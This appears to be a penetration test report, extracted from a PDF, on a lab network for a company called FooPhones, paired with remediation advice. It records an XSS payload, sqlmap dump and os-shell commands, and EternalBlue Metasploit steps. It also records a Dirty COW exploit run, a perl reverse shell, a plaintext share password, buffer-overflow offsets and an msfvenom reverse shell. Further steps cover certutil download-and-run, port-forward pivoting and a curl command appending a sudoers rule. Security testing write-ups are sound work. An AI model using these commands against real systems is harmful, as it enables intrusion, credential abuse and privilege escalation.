Penetration Test Report

Table of Contents
1. Introduction ........................................................................................................... 3
1.1. Scope of Engagement ...................................................................................... 3
1.2. Structurer of Report ........................................................................................ 5
2. Executive Summary ............................................................................................... 5
3. Vulnerability report ................................................................................................ 7
3.1. Web server ....................................................................................................... 7
3.1.1. Cross Site Script (XSS) Injection ............................................................................................. 9
3.1.2. Structure Query Language (SQL) injection ..........................................................................16
3.1.3. PHP Common Gateway Interface (CGI) ...............................................................................21
3.1.4. File Upload Restrictions Bypass ...........................................................................................25
3.1.5.1 Privilege Escalation(Dirty Cow) ..........................................................................................29

1
 3.1.5.3 Privilege Escalation(Sudo) .................................................................................................31
3.1.5.5 Information Disclosure ......................................................................................................33
3.1.5.6 Information Disclosure ......................................................................................................33
3.2. 10.185.10.27 .................................................................................................. 34
3.2.1. EternalBlue ..........................................................................................................................34
3.3. Developer machine ........................................................................................ 37
3.4. 10.185.10.55 .................................................................................................. 41
3.4.1. Buffer Over Flow (BOF) ........................................................................................................41
3.5. Demilitarized Zone (DMZ) .............................................................................. 54
3.5.1. Privilege Escalation ..............................................................................................................56
4. Remediation Plan ................................................................................................ 59
5. Conclusion ........................................................................................................... 62
6. References ........................................................................................................... 62

1.Introduction
This Report is done for FooPhones Company and only meant
people to read this are the managers of the company or the
ones meant to remediate the vulnerabilities found.

1.1 Scope of Engagement

Assessment Type: Black Box

Scope of Engagement:

-Web Server : 10.90.60.80

2
 -Domain : foophonesels.com
-Organization Network: 10.185.10.0/23
-Corporate Network: 10.185.10.0/24
-DMZ: 10.185.11.0/24

-The Architecture for the Place

Figure (1) The Organization Structure

Here we can see that we are facing a new Challenge , because as a penetration tester
you have to reach to the place where everyone is looking for, the DMZ (Demetallized Zone) ,
This zone got the most important information and it is the most critical place in every
3
Organization and the same for this organization because it usually has something important so
you can’t reach it except by being some trusted machine, so our duty is to gain control over
some trusted machine on every network so we can move from a machine to another and from
network to another till we reach the DMZ ,which is our goal

1.2 Structure of the Report

This report will Contain 3 main Parts which are :

-executive summary
-Vulnerability Report
-Remediation Plan
The Executive Summary contains the rule of engagement, The vulnerability report will
contain details about each vulnerability and what should happen, the remediation plan
is how to mitigate all of this.

2. Executive Summary

Type Of Vulnerability Number of Existence

XSS 5
Sql Injection 2
Remote Code Execution 3
4
 Buffer Overflow 1
MS17-010(Eternal-Blue) 2
Information Disclosure 2
Privilege Escalation 2

5
 3.Vulnerability Report

Here we Talk About each IP and What we have Found including

each Vulnerability and its Impact

3.1. 10.90.60.80 (Web Server)

IP: 10.90.60.80
OS: Linux
Port number Service Version
80 http Apache httpd 2.2.8
5923 http Apache httpd 2.2.8

This is the Web Server and The First interaction with the users,As
long as it is not Secured well , we can get an initial Foothold from
here,Usually We Start Enumeration and Scan using tools like Nmap,
Nikto, on the Web Server we are using Nmap and Nikto for
Enumeration
So we use Nmap Using This Command :
Nmap -A -sV -vv -p 1-10000 10.90.60.80 And
the Output is as below:

6
 Figure (2) Nmap-output

We Got 3 ports but what was not protected was 80 and 5923 And
we run Nikto, but on Port 80 it didn’t get anything useful but On
Port 5923 it got amazing results by Running:
Nikto -h http://10.90.60.80:5923

7
 Figure (3) Nikto-output

3.1.1 Cross Site Scripting(XSS)

Description Cross-Site Scripting (XSS) attacks are a type of
injection, in which malicious scripts are
injected into otherwise benign and trusted
websites. XSS attacks occur when an attacker
uses a web application to send malicious
code, generally in the form of a browser side
script, to a different end user. Flaws that
allow these attacks to succeed are quite
widespread and occur anywhere a web
application uses input from a user within the
output it generates without validating or
encoding it.

Impact Medium

CVE N/A

8
Exploitation
Now we are just running Scans but during that I have visited the Website on the PORT
80 and we found our first XSS!
When We visit the Page : http://foophonesels.com it redirects to this page :
“foophonesels.com/welcome.php?welcome=<h2>Welcome! <br><br>We're currently working
on the new website, but check back soon!</h2>”
By injecting the parameter welcome with our XSS payload we will be able to get our payload.

So we inject like that:

“foophonesels.com/welcome.php?welcome=<script>alert(‘xss’)</script>”

Figure (4) XSS-port80-output

Now we Go to Port 5923 to Continue as we found nothing here More..

On The port 5923 we go to the page /services.php and we intercept the request to modify
the Input over burpsuite !

9
Let me make this easier by using burpsuite to test for XSS
Service-Type parameter XSS

Description Field is Vuln!

10
And this is for the Service Name Field!

11
/services.php?serviceid=3

12
3.1.1.2 Remediation:
Remediation of XSS is done in more than 1 way ,and waf alone is not enough,

According to Checkmarks website you can use one of the 3 methods below!

13
1. Escaping

The first method you can and should use to prevent XSS vulnerabilities from
appearing in your applications is by escaping user input. Escaping data means
taking the data an application has received and ensuring it’s secure before
rendering it for the end user. By escaping user input, key characters in the data
received by a web page will be prevented from being interpreted in any malicious
way. In essence, you’re censoring the data your web page receives in a way that
will disallow the characters – especially < and > characters – from being rendered,
which otherwise could cause harm to the application and/or users.

2. Validating Input

Validating input is the process of ensuring an application is rendering the

correct data and preventing malicious data from doing harm to the site, database,
and users. While whitelisting and input validation are more commonly associated
with SQL injection, they can also be used as an additional method of prevention
for XSS. Whereas blacklisting, or disallowing certain, predetermined characters in
user input, disallows only known bad characters, whitelisting only allows known
good characters and is a better method for preventing XSS attacks as well as
others.

3. Sanitizing

A third way to prevent cross-site scripting attacks is to sanitize user input. Sanitizing
data is a strong defense, but should not be used alone to battle XSS attacks. It’s totally possible
you’ll find the need to use all three methods of prevention in working towards a more secure
application. Sanitizing user input is especially helpful on sites that allow HTML markup, to
ensure data received can do no harm to users as well as your database by scrubbing the data
clean of potentially harmful markup, changing unacceptable user input to an acceptable
format.

14
3.1.2 Sql Injection
There are 2 sql injections , one on the login page and one over the “/serviceid=3”
page, how you find about these?
All you need is error to indicate that there is a database behind.
Description SQL injection is a web security
vulnerability that allows an attacker to
interfere with the queries that an
application makes to its database. It
generally allows an attacker to view data
that they are not normally able to retrieve.
This might include data belonging to other
users, or any other data that the
application itself is able to access. In
many cases, an attacker can modify or
delete this data, causing persistent
changes to the application's content or
behavior.
Impact Critical
CVE N/A

Exploitation

15
Fuzzing

Error we looking for

So this is the First Place we got Sqlinjection on, using burpsuite and
sqlmap you can make one sqlinjection by capturing the request on
burpsuite

16
Then putting it on a text file , and sending this to sqlmap, By
using the following command:
Sqlmap –batch -r sqltry.txt –dump-all

This will dump everything it finds

Or the other way to inject on the other place
Which is “/service.php?serviceid=3”
And we got the error we are seeking by injecting into the parameter :
“serviceid=3”

17
By using sqlmap to get a shell on the webserver

Output of sqlmap

And we can get an RCE using “–os-shell” instead of “—dump-all”

18
3.1.2.2 Remediation
There are lots of ways to mitigate Sql injection but the most beloved one to
all the technical people is the input validation, Input Validation:

The validation process is aimed at verifying whether or not the type of

input submitted by a user is allowed. Input validation makes sure it is the
accepted type, length, format, etc. Only the value which passes the validation can
be processed. It helps counteract any commands inserted in the input string. In a
way, it is similar to looking to see who is knocking before opening the door.

Validation shouldn’t only be applied to fields that allow users to type in input,
meaning you should also take care of the following situations in equal measure:

• Use regular expressions as whitelists for structured data (name, age, income,
survey response, zip code, etc.) to ensure strong input validation.
• In case of a fixed set of values (drop-down list, radio button, etc.), determine
which value is returned. The input data should match one of the offered
options exactly.

19
3.1.3 php Common Gatway Interface(CGI)
Description sapi/cgi/cgi_main.c in PHP before
5.3.12 and 5.4.x before 5.4.2, when
configured as a CGI script (aka
phpcgi), does not properly handle
query strings that lack an = (equals
sign) character, which allows remote
attackers to execute arbitrary code
by placing command-line options in
the query string, related to lack of
skipping a certain php_getopt for the
'd' case.

Impact Critical
CVE CVE-2012-1823

This Enumeration from Nikto

20
Usually it is known if the “-s” exist as a parameter on the URL as Nikto
indicated

And as we can see the source code exist here by adding -s so the
vulnerability exists!

21
3.1.3.1 Exploitation
There are 2 ways to exploit this vulnerability, one manually by
adding -d instead of -s and running the commands or using Metasploit, I
have chosen the second way because I need meterpreter later.

3.1.3.2 Remediation
Upgrade to PHP version 5.3.12, PHP versio 5.4.2 or newer. As a workaround add
the following ‘mod_rewrite’ rule: RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC]
RewriteRule ^(.*) $1?

22
3.1.4 File Upload Restriction Bypass
Description Uploaded files represent a significant
risk to applications. The first step in
many attacks is to get some code to
the system to be attacked. Then the
attack only needs to find a way to get
the code executed. Using a file
upload helps the attacker accomplish
the first step.
Impact High
CVE N/A

I was running dirb on the background and it found a directory called

“/accounts.php” ,and we can add a new service!

And I can upload anything so , we can upload a php backdoor to test

23
And I find it on “/pdf”

24
I got remote command execution using file upload

3.1.4.2 Remediation
Lots of ways to mitigate this , let’s speak about some few ways
-“Content-Type” Header Validation

“Content-Type” entity in the header of the request indicates the Internet

media type of the message content. Sometimes web applications use this
parameter in order to recognise a file as a valid one. For instance, they only
accept the files with the “Content-Type” of “text/plain”.

• It is possible to bypass this protection by changing this parameter in the

request header using a web proxy.

25
Whitelisting File Extensions

Applications that check the file extensions using a whitelist method also
need to validate the full filename to prevent any bypass.

• The list of permitted extensions should be reviewed as it can contain

malicious extensions as well. For instance, in case of having “.shtml” in the
list, the application can be vulnerable to SSI attacks.
• Some of the bypass techniques for the blacklist methods such as using
double extensions are also applicable here and should be checked.

Using a File Type Detector

Sometimes web applications intentionally or unintentionally use some

functions (or APIs) to check the file types in order to process them further. For
instance, when an application resize an image file, it may just show an error
message when non-image files are uploaded without saving them on the
server.

• If it reads the few first characters (or headers), it can be bypassed by

inserting malicious code after some valid header or within the file’s
metadata.
• Inserting code in the comments section or those section that have no
effect on the main file can also lead to a bypass.
• The inserted data can be obfuscated or encoded if the application detects
a malicious code using specific patterns or signatures.
• Uploaded file can be crafted to create a malicious code in case of being
compressed by the application.

3.1.5 Privilege Escalation (using Dirty Cow)

26
 Description (Dirty copy-on-write) is a computer security
vulnerability for the Linux kernel that affects all
Linux-based operating systems
including Android that use older versions of the
Linux kernel. It is a local privilege escalation bug
that exploits a race condition in the
implementation of the copy-on-write mechanism
in the kernel's memory-management subsystem.
The vulnerability was discovered by Phil Oester

Impact Critical
CVE CVE-2016-5195

3.1.5.1 Exploitation
Well, we have found 3 ways to get inside, let’s use one of them
(sqlmap sqli , Metasploit-php-cgi , file upload), I will use metasploit module.
After I drop into a shell I try to execute the exploit so I need a shell like real user,
which is called TTY shell by using python:
“ python -c 'import pty; pty.spawn("/bin/sh")' “

And by typing uname -a we can check if the version of the linux exploitable or not!

Now I fire up my python simple Http Server to upload files to my victim machine
By using :
“ python -m SimpleHTTPServer “
and then we go to our victim machine and download our exploit dirty.c

27
Here after we downloaded dirty.c (dirty cow exploit)

Compile it by using :
“ gcc -pthread dirty.c -o dirty -lcrypt “
then we run it ” ./dirty password”
and now we have a new user on the group of root which is called firefart so
all we do is change to this user using su!
“ Su firefart “ then enter
your password
and you will become a user firefart which is root

28
3.1.5.2 Remediation
Download the latest ubuntu or Linux version and use it , this exploit only
affects the old versions

3.1.5.3 Another privilege escalation :

After running sudo -l I found out that there is a script a root can run, so by
adding a reverse shell in perl and running this script as a root i will gain root

Getting a reverse perl shell from here:

https://github.com/pentestmonkey/perl-reverse-shell/blob/master/perl-reverse-shell.pl

I download it and call it backup.py

We change the $ip to our ip and $port to our port
And then I upload it on the victim machine like before using the python simple
http server, and then I put it as /root/backup.pl and let’s try to run
/root/backup.pl as root (backup.pl now is our reverse shell!)

29
And then we got root
3.1.5.4 Remediation
The low privileged user shouldn’t be able to run commands as a root under
any circumstances, and shouldn’t be able to modify a file that belongs to root or
in the root directory

3.1.5.5 Information Disclosure

While enumeration I found some credentials which would lead me to the
next step on a file on the directory “ /home/Michael”

And Another information disclosure for the Database Connection

30
3.2. 10.185.10.27

IP: 10.185.10.27
OS: Windows 7
Port Number Service Running
135 SMB
139 SMB
445 Netbios

3.2.1 Eternalblue

31
 Description EternalBlue is the name given to a
software vulnerability in Microsoft's
Windows operating system. The tech
giant has called it EternalBlue
MS17010 and issued a security
update for the flaw on March 14. The
patch was issued before the
WannaCry ransomware spread
around the world and those who had
updated early would have been
protected.
Impact Critical
CVE 2017-0144

3.2.1.1 Exploitation
in order to gain access over 10.185.10.0/24 subnet I had to run autoroute
to route through the pawned machine which is the linux machine (the web
server) so I had to run autoroute from meterpreter
“ autoroute -s 10.185.10.0/24 “

Now let’s see if someone is alive on the next subnet so we use ping_sweep to
check it out

32
And we find 3 hosts :
10.185.10.1 10.185.10.27 10.185.10.34
I suppose the first one is the gateway so I didn’t find anything useful regarding it
but the other 2 were interesting, I scanned them first using portscan module then
scanned them again using the auxiliary module :
Port Scan Module

“auxiliary/admin/smb/ms17_010_command”
Then I went for eternalblue exploit which was psexec module using the following
commands on Metasploit:

33
“use exploit/windows/smb/ms17_010_psexec “ “ set RHOSTS 10.185.10.27 “ “ set
payload windows/meterpreter/bind_tcp” “ run “

And we are in :

And while enumeration this file was found

34
it would lead to the next target

3.2.1.2 Remediation
In case you want to keep using windows 7 it has to be patched according to Microsoft articles:

https://support.microsoft.com/en-us/help/4023262/how-to-verify-that-ms17-010-is-installed

but it is better to upgrade to the latest version of windows 10 or currently supported Operating System

3.3 10.185.10.34 (Developer Machine)

IP : 10.185.10.34 OS:
Windows 7
Port Number Service Running
135 SMB
139 SMB
445 NetBios

Exploitation!
35
 we use the same module of Metasploit to login to the machine
10.185.10.34 as it has proven to be vulnerable , but there is a slight
difference as it needs to add username and password first to exploit
this and luckily we have them from the Web-Server and the
username was share_admin while the password was
“Wind0wz87!kj “
let’s start the pawning using the same Metasploit module

36
3.3.1 Remediation
The Same Steps done for 10.185.10.27 should be done for this
machine too
Then we found these 3 files and they indicate a connection to another
machine which is 10.185.10.55

So let’s go for Arp post module by using

37
“ exploit/windows/gather/arp_scanner”

And we got 10.185.10.55 as we intended to look for it to have the

buffer overflow shell

38
3.4. 10.185.10.55

Port Number Service Running

4242 Customer Manager Portal

3.4.1 Buffer Overflow

Description A buffer overflow, or buffer

overrun, is a common software
coding mistake that an attacker
could exploit to gain access to
your system. To effectively
mitigate buffer overflow
vulnerabilities, it is important to
understand what buffer overflows
are, what dangers they pose to
your applications, and what
techniques attackers use to
successfully exploit these
vulnerabilities.

Impact High
CVE N/A

Now it is a buffer overflow

The file CustomerManagerClient.py

39
After fuzzing with mona by typing !mona pc 200 I found out it is a buffer
overflow and 200 works as a buffer overflow no problem, but I did it in
2 ways so I will be explaining what I did,
First I used Metasploit pattern_create and mona to validate my output

I add the junk pattern and send the exploit to check my results

And it crashes at this address

40
Now I have to get the offset so I can use 2 ways :
1- Using Mona :
2- With Metasploit
Using Mona is like the following :

I type “ !mona po 39654138 “ and it gets me 146

2-using the Metasploit I use pattern_offset

41
And still I get 146 , so afterall I can use 146 Now
my exploit is like that :

Why the IP is 192.168.1.2 because I am still testing on my local

environment before publishing the exploit
And “BBBB” to validate the correct EIP value , did we hit it or not.

42
and seems like we did

And now we add the bad characters to validate which one Is the bad
one,
And we have “ \x00” and “\x0A”
And I want the jmp esp address, so I use mona to get it.
Now the jmp esp address as shown below is :

43
“080414c3 “
The Application is a little endian so I type it on reverse:
"\xc3\x14\x04\x08"
So this is our jumping address, I made a break point and ran it over and over to
make sure it works, and it did, now the last hard part, the shell , how I can get it
while it is on another subnet and It has to pass through 2 machines first!
So I figured out I have to get it on one of my pawned machines , either Developer
machine or 10.185.10.27.

44
So this is the exploit without any shell

And “\x90” Is a no operation space to avoid overwriting on itself Let’s

create our MSFVENOM Reverse Shell:
“Msfvenom -p windows/shell/reverse_tcp LHOST=10.185.10.34 LPORT=1313 -f py”

45
This is a little tricky, I have to make the Connection go by using my reverse shell
from “ 10.185.10.55  10.185.10.34  10.90.60.80  my-ip “
I can do that using more than one way, using iptables , or using run autoroute -s
on the meterpreter or using the manual way , but I choose the manual way
because I couldn’t make the other 2 work.
Using netsh on windows and netcat or socat on linux

On windows 10.185.10.34:
“netsh interface portproxy add v4tov4 listenaddress=10.185.10.34 listenport=1313
connectaddress=10.90.60.80 connectport=1313 “

Now the linux machine

46
“socat TCP-LISTEN:1313,bind=10.90.60.80,fork,reuseaddr
TCP:172.16.40.5:1313&”

And then finally we use socks4a

Why socks4a to bind all of this together, why 0.0.0.0 for any interface , I can make
it 127.0.0.1 or whatever I want

47
And on the file “/etc/proxychains.conf”

We add it
Now Let’s run our exploit using proxychains but first let’s configure our listener on
Metasploit

48
And we are inside as “NT Authority\System”
Now I do the Same to get a Reverse_Shell over meterpreter but this time over
port 3030

49
We make a shell using msfvenom and send it using python simple http server

Using Certutil command we Download it

50
“certutil -urlcache -split -f http://10.185.10.55:1313/exp.exe C:\\exp.exe”

And finally we got a Reverse Shell Over Meterpreter, now let’s Enumerate the
machine to get as maximum information as we can
3.4.2 Remediation
Use a more modern language like C# hence it has a GDBC it is almost
immune to such attacks ,and you always have to detect your vulnerabilities
before someone else does, and avoid dangerous methods and parameters, like in
C “strcpy “ you always have to review your code or give it to someone to review it
before trying to use it

3.5 DMZ(Demilitarized Zone)

IP: 10.185.11.127
OS: Linux
Port Number Service
SSH 22

51
What we are able to find here is vulnerable WinSCP
Using Metasploit again

52
3.5.1. Privilege Escalation
We got Username and Password!
I try to find more hosts

But nothing, only this one

I think we can use proxychains now to login to Jeremy’s ssh over the
DMZ

53
And we are in,
Now let’s enumerate jeremy’s directory

And we find something interesting

54
So I can run a file as a root through the localhost Ok,
let’s try to make the Sudoers rule (ALL:ALL)..
“curl -d "z=echo '%jeremy ALL=(root:root) ALL' >> /etc/sudoers"
http://127.0.0.1:8989/z-cmd.php” And finally we are root!

55
 4.Remediation Plan
As for the web server Always be sure to use the latest
versions of everything , for example the PHP version, make sure
to use input validation and never trust the user’s input,and this
will solve all of the problems regarding the XSS,Sql Injection,
File Upload, only if you validate the input

As from my point of view everything is according to the mistake

of no patching , if everything was patched it would have been
better, the windows machines need to be patched, and the
software needs code review from the prespective of security
and penetration test as well
1- XSS:
a. Validating input
b. Escaping
c. Sanitizing 2- Sql Injection:
a. all it needs is just input validation 3-
php-CGI:
a. Upgrade to the latest version of PHP 4-
File Upload Restriction:
a. Blacklisting file extensions
b. Beating getimagesize
c. Whitelisting File Extensions
d. “Content-Type” Header Validation
56
 e. Using file type Detector 5- Privilege Escalation:
a. Upgrade to the latest linux (ubuntu or
whatever)version
b. As for the Sudo , don’t let any user run any script as
high privilege and don’t give the user any permission
over root directory 6- EternalBlue:
a. The MS17-010 Update is perfect solution for this
b. it is always good to have the last Windows or OS
Supported by Microsoft if you are using it
7- Buffer Overflow
a. Always make a pentest over any application before
using it or publishing it , and always try to use a
secure language like C# and all of .NET library they
have GDBC ,and try to implement secure code
mechanism over any language that doesn’t have
protection over Buffer overflow like C and C++

Host (IP) Open Services Access

Vulnerabilities
Ports Obtained
Exploited

57
 10.90.60.80 80, 5923 http YES PHP-CGI ,
XSS, Sql Injection,
unrestricted File
Upload,
Information
Disclosure
Privilege Escalation
10.185.10.27 135, 139, YES
RPC, Eternal-Blue ,
445
NETBIOS, Information
SMB, Disclosure
RTSP
10.185.10.34 135, 139, YES Eternal -Blue,
RPC,
445 Net BIOS,
SMB
10.185.10.1 135 RPC NO

10.185.10.55 42424 Customer- YES Buffer Over Flow

ManagerPortal (BOF)
10.185.11.127 22 ssh YES Privilege Escalation

10.185.11.1 135 RPC No

5. Summary and Conclusion

The Company can be hacked in a matter of hours by a dedicated hacker,
so the security vulnerabilities should be patched as soon as possible

58
and make a regular basis penetration test to make sure everything is
running well , and after all I deleted all my footholds and
Cleaned the House by resetting the labs,
Thanks

6. References

•
https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload
•
https://www.checkmarx.com/2017/10/09/3-ways-prevent-xss/
•
https://en.wikipedia.org/wiki/Dirty_COW

•
https://beyondsecurity.com/scan-pentest-network-vulnerabilities-php-cgi-query-string-codeexecution.html

•
https://owasp.org/www-community/attacks/SQL_Injection
•
https://owasp.org/www-community/attacks/xss/
•
https://en.wikipedia.org/wiki/EternalBlue

•
https://netsec.ws/?p=337

59